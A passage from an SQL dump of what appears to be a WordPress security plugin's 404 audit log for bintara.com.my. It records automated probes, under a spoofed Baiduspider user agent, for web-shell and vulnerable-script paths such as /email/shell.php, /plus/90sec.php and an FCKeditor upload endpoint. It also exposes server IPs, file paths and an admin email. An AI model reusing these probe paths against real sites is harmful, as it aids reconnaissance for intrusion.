200\";s:54:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyaH8C1sJTsX3mg7G4IswAAABQ\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/fckeditor/editor/filemanager/upload/php/upload.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:51:\"/fckeditor/editor/filemanager/upload/php/upload.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyaH8C1sJTsX3mg7G4IswAAABQ\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/fckeditor/editor/filemanager/upload/php/upload.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:51:\"/fckeditor/editor/filemanager/upload/php/upload.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyaH8C1sJTsX3mg7G4IswAAABQ\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/fckeditor/editor/filemanager/upload/php/upload.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:51:\"/fckeditor/editor/filemanager/upload/php/upload.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyaH8C1sJTsX3mg7G4IswAAABQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/fckeditor/editor/filemanager/upload/php/upload.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:51:\"/fckeditor/editor/filemanager/upload/php/upload.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZyaH8C1sJTsX3mg7G4IswAAABQ\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"65297\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:73:\"https://bintara.com.my/fckeditor/editor/filemanager/upload/php/upload.php\";s:10:\"SCRIPT_URL\";s:51:\"/fckeditor/editor/filemanager/upload/php/upload.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZyaH8C1sJTsX3mg7G4IswAAABQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544159.3836\";s:12:\"REQUEST_TIME\";s:10:\"1570544159\";}}','notice','2019-10-08 14:16:01','2019-10-08 14:15:59',35079096,36884984,'https://bintara.com.my/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media',1,0,'119.187.228.206'),(27682,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/email/shell.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:15:\"108.213.116.123\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=660489249402586a9432946399bbde57\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"108.213.116.123\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/email/shell.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/email/shell.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyabcfRZ9CaO@EBI5kEGQAAAIE\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/email/shell.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/email/shell.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyabcfRZ9CaO@EBI5kEGQAAAIE\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/email/shell.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/email/shell.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZyabcfRZ9CaO@EBI5kEGQAAAIE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"62676\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/email/shell.php\";s:10:\"SCRIPT_URL\";s:16:\"/email/shell.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZyabcfRZ9CaO@EBI5kEGQAAAIE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570544237.249\";s:12:\"REQUEST_TIME\";s:10:\"1570544237\";}}','notice','2019-10-08 14:17:18','2019-10-08 14:17:17',35051760,36853648,'https://bintara.com.my/email/shell.php',1,0,'108.213.116.123'),(27683,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:70:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:36:\"/utility/convert/data/config.inc.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:15:\"225.225.159.142\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=2086384f0be0b16fc267fe0b9d341528\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"225.225.159.142\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:50:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:58:\"https://bintara.com.my/utility/convert/data/config.inc.php\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:36:\"/utility/convert/data/config.inc.php\";s:56:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:51:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:54:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyayMfRZ9CaO@EBI5kEvAAAAIU\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:58:\"https://bintara.com.my/utility/convert/data/config.inc.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:36:\"/utility/convert/data/config.inc.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyayMfRZ9CaO@EBI5kEvAAAAIU\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:58:\"https://bintara.com.my/utility/convert/data/config.inc.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:36:\"/utility/convert/data/config.inc.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyayMfRZ9CaO@EBI5kEvAAAAIU\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:58:\"https://bintara.com.my/utility/convert/data/config.inc.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:36:\"/utility/convert/data/config.inc.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyayMfRZ9CaO@EBI5kEvAAAAIU\";s:19:\"REDIRECT_SCRIPT_URI\";s:58:\"https://bintara.com.my/utility/convert/data/config.inc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:36:\"/utility/convert/data/config.inc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZyayMfRZ9CaO@EBI5kEvAAAAIU\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"62766\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:58:\"https://bintara.com.my/utility/convert/data/config.inc.php\";s:10:\"SCRIPT_URL\";s:36:\"/utility/convert/data/config.inc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZyayMfRZ9CaO@EBI5kEvAAAAIU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544328.7802\";s:12:\"REQUEST_TIME\";s:10:\"1570544328\";}}','notice','2019-10-08 14:18:50','2019-10-08 14:18:49',35067368,36871632,'https://bintara.com.my/utility/convert/data/config.inc.php',1,0,'225.225.159.142'),(27684,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/data/96test.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"45.187.98.178\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=3faa319ba1754ce4a0a98483bb6e9abe\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"45.187.98.178\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/data/96test.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/data/96test.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZya2MC1sJTsX3mg7G4I2AAAABQ\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/data/96test.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/data/96test.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZya2MC1sJTsX3mg7G4I2AAAABQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/data/96test.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/data/96test.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZya2MC1sJTsX3mg7G4I2AAAABQ\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"49338\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/data/96test.php\";s:10:\"SCRIPT_URL\";s:16:\"/data/96test.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZya2MC1sJTsX3mg7G4I2AAAABQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544344.4964\";s:12:\"REQUEST_TIME\";s:10:\"1570544344\";}}','notice','2019-10-08 14:19:06','2019-10-08 14:19:04',35056160,36863768,'https://bintara.com.my/data/96test.php',1,0,'45.187.98.178'),(27685,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/plus/90sec.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"212.54.106.11\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=b466188fd6c03a7a4bb3f2f9738627ce\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"212.54.106.11\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/90sec.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/90sec.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZybAcfRZ9CaO@EBI5kE3AAAAJI\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/90sec.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/90sec.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZybAcfRZ9CaO@EBI5kE3AAAAJI\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/90sec.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/plus/90sec.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZybAcfRZ9CaO@EBI5kE3AAAAJI\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"56478\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/90sec.php\";s:10:\"SCRIPT_URL\";s:15:\"/plus/90sec.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZybAcfRZ9CaO@EBI5kE3AAAAJI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544385.3035\";s:12:\"REQUEST_TIME\";s:10:\"1570544385\";}}','notice','2019-10-08 14:19:47','2019-10-08 14:19:45',35055064,36855664,'https://bintara.com.my/plus/90sec.php',1,0,'212.54.106.11'),(27686,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:70:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:39:\"/plugins/weathermap/configs/test404.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:14:\"242.18.146.142\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=89c17d821b39ecec4ef015c517a074da\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"242.18.146.142\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:50:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:61:\"https://bintara.com.my/plugins/weathermap/configs/test404.php\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:39:\"/plugins/weathermap/configs/test404.php\";s:56:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:51:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:54:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZybKFQ75tQHORtJE8pm2gAAAEQ\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:61:\"https://bintara.com.my/plugins/weathermap/configs/test404.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:39:\"/plugins/weathermap/configs/test404.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZybKFQ75tQHORtJE8pm2gAAAEQ\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:61:\"https://bintara.com.my/plugins/weathermap/configs/test404.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:39:\"/plugins/weathermap/configs/test404.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZybKFQ75tQHORtJE8pm2gAAAEQ\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:61:\"https://bintara.com.my/plugins/weathermap/configs/test404.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:39:\"/plugins/weathermap/configs/test404.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZybKFQ75tQHORtJE8pm2gAAAEQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:61:\"https://bintara.com.my/plugins/weathermap/configs/test404.php\";s:19:\"R